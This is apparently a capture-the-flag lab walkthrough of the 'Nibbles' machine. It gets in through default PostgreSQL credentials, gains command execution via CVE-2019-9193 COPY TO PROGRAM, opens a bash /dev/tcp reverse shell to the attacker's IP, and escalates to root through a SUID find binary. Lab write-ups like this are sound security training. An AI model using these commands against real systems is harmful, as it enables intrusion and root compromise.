Nibbles
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.215.47
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 20:21 EST
Nmap scan report for 192.168.215.47
Host is up, received echo-reply ttl 61 (0.15s latency).
Scanned at 2025-11-07 20:21:08 EST for 49s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 10:62:1f:f5:22:de:29:d4:24:96:a7:66:c3:64:b7:10 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJgyzpWrB8SyLb/XmPYQYzsnfizW7d0aNZHpwQ9ivcHQ/RYLbCc8yUIQGN2JMqCgfSj8CRMA36UnV8jnngjkw9njcgMyA5qc1mO4tzzH7VNkW2t5AmP7Q1HBt+SThlLa0Jx
BN6Gd5BOPwrsk9YTjLj8ax2ncvGBq8jzQjYmm9jF4VgBak5DY+Q5JWdf9krumSlR+V8yneV9aQ6sVy2XgkCJQLQ8GoUTm/13XUTc3TCKQ2KOJ2FzA8VcNTfxqTDxalwnYrZ1tod7BRfMeff5MwxC5gzeB+hdOVC0zAZlvNtMxH6
SCxMBRCoX9IHL27E6WtSGXCj1SLYJWrFImjp+I1L
| 256 c9:15:ff:cd:f3:97:ec:39:13:16:48:38:c5:58:d7:5f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM7uIYLogPsKP+c0QrezqQfB94ml7djfUOtG8ZAoMX6yK898l0TbgyAShcQSmdOsSMGdSO4GZpixCFJdsYkBi0M=
| 256 90:7c:a3:44:73:b4:b4:4c:e3:9c:71:d1:87:ba:ca:7b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKoHnGdMtb37ORTRBt2cTfWvQE7IB3fF3ewP/1tqn0JF
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
|_http-title: Enter a title, displayed at the top of the window.
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
5437/tcp open postgresql syn-ack ttl 61 PostgreSQL DB 11.3 - 11.9
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Issuer: commonName=debian
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-27T15:41:47
| Not valid after: 2030-04-25T15:41:47
| MD5: b086:6d30:4913:684e:16c1:8348:fc76:fe43
| SHA-1: cb30:5109:0fc1:14ab:0fb9:8e55:5874:4bb5:ba57:66af
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIUYoM4kALX3eWKWuCQ1/K5FujVbGowDQYJKoZIhvcNAQEL
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
<snipped>This time we have postgresql service running on port 5437.
I enumerated all other services but nothing lead to find anything useful except for postgresql.
Postgresql (5437):
We can interact with postgresql through the command line tool called psql.
I tried some different combinations of default credentials such as admin:admin, etc. postgres:postgres worked for me:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ psql -h 192.168.215.47 -p 5437 -U postgres
Password for user postgres: postgres
psql (17.6 (Debian 17.6-1), server 11.7 (Debian 11.7-0+deb10u1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, compression: off, ALPN: none)
Type "help" for help.
postgres=#I did not find anything interesting in the databases.
Exploitation:
From the nmap result we can guess the version of this service is between 11.3 to 11.9.
I searched for public exploits, and found that we can get command execution:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ searchsploit postgresql 11.
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) | multiple/remote/50847.py
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ searchsploit -m 50847
Exploit: PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/50847
Path: /usr/share/exploitdb/exploits/multiple/remote/50847.py
Codes: CVE-2019–9193
Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Nibbles/50847.py
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ python3 50847.py -i 192.168.215.47 -p 5437 -c whoami -U postgres -P postgres
[+] Connecting to PostgreSQL Database on 192.168.215.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _121e8b8e5b4598406bf35c942ae58806
[+] Command executed
postgres
[+] Deleting table _121e8b8e5b4598406bf35c942ae58806Or we can perform it manually ourselves, using the copy to/from program query.
First lets confirm we have command execution:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytesAnd send icmp packets through ping command:
postgres=# COPY (SELECT '') to PROGRAM 'ping 192.168.45.174 -c 3';
COPY 1┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
20:36:39.391134 IP 192.168.215.47 > 192.168.45.174: ICMP echo request, id 1225, seq 1, length 64
20:36:39.391163 IP 192.168.45.174 > 192.168.215.47: ICMP echo reply, id 1225, seq 1, length 64
20:36:40.390572 IP 192.168.215.47 > 192.168.45.174: ICMP echo request, id 1225, seq 2, length 64
20:36:40.391067 IP 192.168.45.174 > 192.168.215.47: ICMP echo reply, id 1225, seq 2, length 64
20:36:41.392266 IP 192.168.215.47 > 192.168.45.174: ICMP echo request, id 1225, seq 3, length 64
20:36:41.392288 IP 192.168.45.174 > 192.168.215.47: ICMP echo reply, id 1225, seq 3, length 64
^C
6 packets captured
6 packets received by filter
0 packets dropped by kernelIndeed we have blind RCE.
Get a reverse shell, I will use one of the exposed ports with netcat to avoid firewall issues with ports:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ nc -nlvp 80
listening on [any] 80 ...postgres=# COPY (SELECT '') to PROGRAM 'bash -c "bash -i >& /dev/tcp/192.168.45.174/80 0>&1"';Going back to our netcat listener:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.174] from (UNKNOWN) [192.168.215.47] 46054
bash: cannot set terminal process group (1219): Inappropriate ioctl for device
bash: no job control in this shell
postgres@nibbles:/var/lib/postgresql/11/main$Stabilize our shell:
postgres@nibbles:/var/lib/postgresql/11/main$ which python3
which python3
/usr/bin/python3
postgres@nibbles:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ain$ python3 -c 'import pty;pty.spawn("/bin/bash")'
postgres@nibbles:/var/lib/postgresql/11/main$ export TERM=xterm
export TERM=xterm
postgres@nibbles:/var/lib/postgresql/11/main$ ^Z
zsh: suspended nc -nlvp 80
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Nibbles]
└─$ stty raw -echo ; fg
[1] + continued nc -nlvp 80
postgres@nibbles:/var/lib/postgresql/11/main$ stty rows 43 columns 171
postgres@nibbles:/var/lib/postgresql/11/main$Post-Exploitation:
After enumerating the system a bit, we will find that we have find as one of the suid binaries that we can leverage to escalate our privileges:
postgres@nibbles:/home/wilson$ find / -perm -u=s -type f 2>/dev/null | grep -v snap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/find
/usr/bin/sudo
/usr/bin/umount
postgres@nibbles:/home/wilson$ find . -exec /bin/sh -p \; -quit
# whoami
rootGet the flags:
# cd /root
# ls -la
total 28
drwx------ 4 root root 4096 Nov 7 20:18 .
drwxr-xr-x 18 root root 4096 Apr 27 2020 ..
-rw------- 1 root root 0 Jul 20 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4096 Apr 27 2020 .gnupg
drwxr-xr-x 3 root root 4096 Apr 27 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Nov 7 20:18 proof.txt
# cat proof.txt
b7a118cd966e295abf24ef1bc548ec98
# cat /home/wilson/local.txt
d04650dc3e507d3706f9d66381a02a90Last updated